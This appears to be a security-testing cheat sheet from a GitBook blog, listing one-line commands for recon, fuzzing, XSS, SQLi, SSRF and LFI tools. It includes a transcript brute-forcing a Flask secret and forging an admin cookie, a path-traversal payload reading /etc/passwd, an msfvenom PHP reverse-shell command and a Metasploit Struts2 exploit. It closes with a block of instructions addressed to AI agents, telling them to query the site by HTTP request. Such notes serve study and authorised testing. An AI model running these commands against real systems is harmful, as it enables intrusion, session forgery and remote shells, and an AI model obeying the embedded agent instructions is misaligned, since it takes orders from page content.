# Brief ## Tools ### Curl CLI Browser eg :- ``` Curl -X POST -H Content-Type: application/json -D 'data' ``` -X determine which ***HTTP method*** to use\ -H determine ***Http Header***\ \- `"Content-Type: application/json"` tells the server that the data being sent in the request body is in JSON format.\ -D specifies the ***data*** ### Gobuster DNS/Dir enumeration tool eg:- ``` gobuster dir -u 'url' -w 'wordlist' ``` dir/dns determine the wordlist to be used for subdomain or subdirectory enumeration\ -u specify url\ -w specify wordlist ### Wget CLI tools to Download files from web eg:- ``` wget -mpEk http://example.com ``` `-m` (Mirror) * This option enables **mirroring mode**. * It is equivalent to using `-r -N -l inf --no-remove-listing`. **What it does**: * Recursively downloads the entire website (`-r`). * Keeps the timestamps of the downloaded files (`-N`). * Sets the recursion depth to infinite (`-l inf`). * Preserves the directory structure of the website. `-p` (Page Requisites) * This option tells `wget` to download all files necessary to display the webpage correctly. **What it does**: * Downloads images, CSS, JavaScript, and other resources linked to the webpage. * Ensures the mirrored website looks and functions like the original. `-E` (Adjust Extensions) * This option adjusts the file extensions of downloaded files. **What it does**: * Adds `.html` to files that are HTML but don’t have an extension. * Ensures that HTML files are properly recognized by browsers. `-k` (Convert Links) * This option converts links in the downloaded files to make them work locally. **What it does**: * Updates absolute URLs (e.g., `http://example.com/page.html`) to relative paths (e.g., `page.html`). * Ensures that the mirrored website works offline without requiring an internet connection. > \[!NOTE]\ > This will: > > 1. Download the entire website (`http://example.com`). > 2. Save it to a local directory named `example.com`. > 3. Ensure the website works offline by converting links and downloading all necessary resources. ### Flask-Unsign Flask cookie sign/unsign. ``` ┌──(kali㉿kali)-[~/Desktop/rough] └─$ flask-unsign -u -c "eyJ2ZXJ5X2F1dGgiOiJ3YWZlciJ9.Z9WSDg.6i5-bXRGi3l8qzzi9IhtouRGPKk" --no-literal-eval -w name.txt [*] Session decodes to: {'very_auth': 'wafer'} [*] Starting brute-forcer with 8 threads.. [+] Found secret key after 28 attemptscadamia b'peanut butter' ┌──(kali㉿kali)-[~/Desktop/rough] └─$ flask-unsign -s -c "{'very_auth':'admin'}" -S 'peanut butter' eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.Z9WS4g.yICKFWtn5VA05DLkCIMZeJImq-o ``` `-u` unsign`-c` cookie value`--no-literal-eval`\ 1\. When decoding a session cookie, Flask-Unsign uses `literal_eval` to safely convert the decoded string into a Python object (e.g., a dictionary).\ 2\. The `--no-literal-eval` option tells Flask-Unsign **not to use `literal_eval`** when decoding the session cookie.\ 3\. Instead, it treats the decoded data as a raw string without attempting to convert it into a Python object.`-w` wordlist`-s` sign`-S` secret NUCLEI\ SUBLISTER\ HTTPX\ JSLINKFINDER ### subdomain enum subfinder\ subfinder -d target.com -o subdomain.txt\ %%it queries public sources like ssl certs, APIs and search engines%%\ assetfinder\ assetfinder --subs-only target.com >> subdomains.txt\ %%sources like search/cert spotter, hacker target and fb certificate transparancy logs%%\ amass\ amass enum -passive -d target.com -o subdomain.txt\ %%gathers data from OSINT sources%% ### Port scanning nmap\ nmap -p- --open -sV -sC -T4 -oN nmap\_results.txt target.com\ masscan - **BEST TOOL**\ masscan -p1-65535 --rate 10000 -oL masscan\_results.txt target.com ### AUTO SS capture eyewitness\ eyewitness -f subdomains.txt --web\ aquatone\ cat subdomains.txt | aquatone -out screenshots/ ### Directory bruteforce ffuf\ gobuster ### Automating JS linkfinder\ python3 linkfinder.py -i https: //target.com/scripts.js -o results.html\ %%used to extract hidden endpoints, API URL and JS files%%\ GF\ cat js\_files.txt | gf apikeys > secrets.txt\ %%This command used for API key extraction using GF%% ### Automating parameter discovery %%can help find xss, open redirects, IDOR and SQLi%%\ paramspider\ python3 paramspider.py -d target.com --level high -o params.txt\ %%Tool designed to extract GET parameters from a target website%%\ arjun\ arjun -u https: //target.com/api -m GET -o params.json\ %%parameter discovery for API endpoints using GET and POST param Bruteforcing%% ### Automate XSS Detection dalfox\ cat params.txt | dalfox pipe -o xss\_results.txt\ xsstrike\ python3 xsstrike.py -u "https: //target.com/index.php?search=query" ### Automate SQLi SQLmap\ sqlmap -u "https: //target.xom/index.php?id=1" --dbs --batch --random-agent ### Automate SSRF Gopherus\ python3 gopherus.py\ %%used to generate payloads. this protocol allows sending raw tcp data useful for attacking Reddus MySQL and other services%%\ Interactsh\ interactsh-client -v ### Automating LFI/RFI lfisuite\ python3 lfisuite.py -u "https: //target.com/index.php?file=../../../etc/passwd"\ fimap\ fimap -u "https: //target.com/index.php?file=test" ### Automating open redirect oralizer\ python3 oralyzer.py -l urls.txt -p payloads.txt ### Automating sec headers check %%Security headers protect website from xss clickjacking and data injection%%\ nikto %%checks for vulnerablities and misconfigurations%%\ nikto -h target.com\ httpx\ httpx -u target.com -sc -title -server -o headers.txt ### Automating API recon kiterunner\ kiterunner -u http: //target.com -w wordlists/apis.txt ### Automating content discovery gau\ gau target.com | tee urls.txt\ waybackurls\ waybackurls target.com > wayback.txt ### Automating S3 bucket enum AWSbucket dump\ python3 AWSBucketDump.py -l target-buckets.txt -D ### Automating CMS enum CMseek\ python3 cmseek.py -u target.com ### Automating WAF (WebApp firewall) Detection wafwoof\ wafwoof https: //target.com ### Automating Information Disclosure %%recover exposed git data%%\ GitDumper\ python3 GitDumper.py https: //target.com/.git /output-folder/ ### Automating REVSHELL msfvenom\ msfvenom -p php/meterpreter/reverse\_tcp LHOST=your\_ip LPORT=4444 -f raw > shell.php ### Automating mass exploitation metasploit\ %%vuln exploit%%\ msfconsole\ use exploit/multi/http/struts2\_namespace\_ognl --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://foothold.gitbook.io/blog/tools/brief.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.